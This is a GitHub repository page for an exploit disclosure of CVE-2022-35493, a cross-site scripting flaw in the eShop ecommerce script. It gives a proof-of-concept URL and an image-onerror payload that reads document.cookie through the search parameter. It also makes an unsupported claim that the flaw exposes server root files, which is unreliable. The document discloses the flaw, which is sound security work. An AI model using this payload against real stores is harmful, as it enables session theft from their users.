Skip to content

Keyvanhardani/Exploit-eShop-Multipurpose-Ecommerce-Store-Website-3.0.4-Cross-Site-Scripting-XSS

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

17 Commits

LICENSE

LICENSE

 
 

README.md

README.md

 
 

Repository files navigation

Exploit Title: eShop - Multipurpose Ecommerce / Store Website 3.0.4 - Cross Site Scripting (XSS)
CVE: CVE-2022-35493
Exploit Author: Keyvan Hardani
Date: 18/11/2021
Update: 01.06.2022
Vendor Homepage: https://wrteam.in/
Version: up to 3.0.4
Tested on: Kali Linux - Windows 10

Vulnerability fields:
=============

```
<span class="select2-selection__rendered" id="select2-x7vs-container" role="textbox" aria-readonly="true"></br>
       <span class="select2-selection__placeholder">Search for products </span></br>
</span> 
```



--- on search parser and the json response

Cross-site scripting (XSS) vulnerability in json search parse and the json response in wrteam.in, eShop - Multipurpose Ecommerce / Store Website version 3.0.4 allows remote attackers to inject arbitrary web script or HTML via the get_products?search parameter.

POC - To demonstrate the XSS via the Error parameter, the following method can be used:
=============
https://site.com/home/get_products?search=%22%3E%3CIMG%20SRC%3Dindex.php%20onerror%3Dalert(document.cookie)%3E

Payload : <IMG SRC=index.php onerror=alert(document.cookie)>

Security Risk
=============

This security vulnerability allows to execute arbitrary JavaScript code in users' browsers if they access URLs prepared by attackers.
This security vulnerability allows to direct access to your root files on your server.

About

No description, website, or topics provided.

Resources

Readme

License

GPL-3.0 license
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published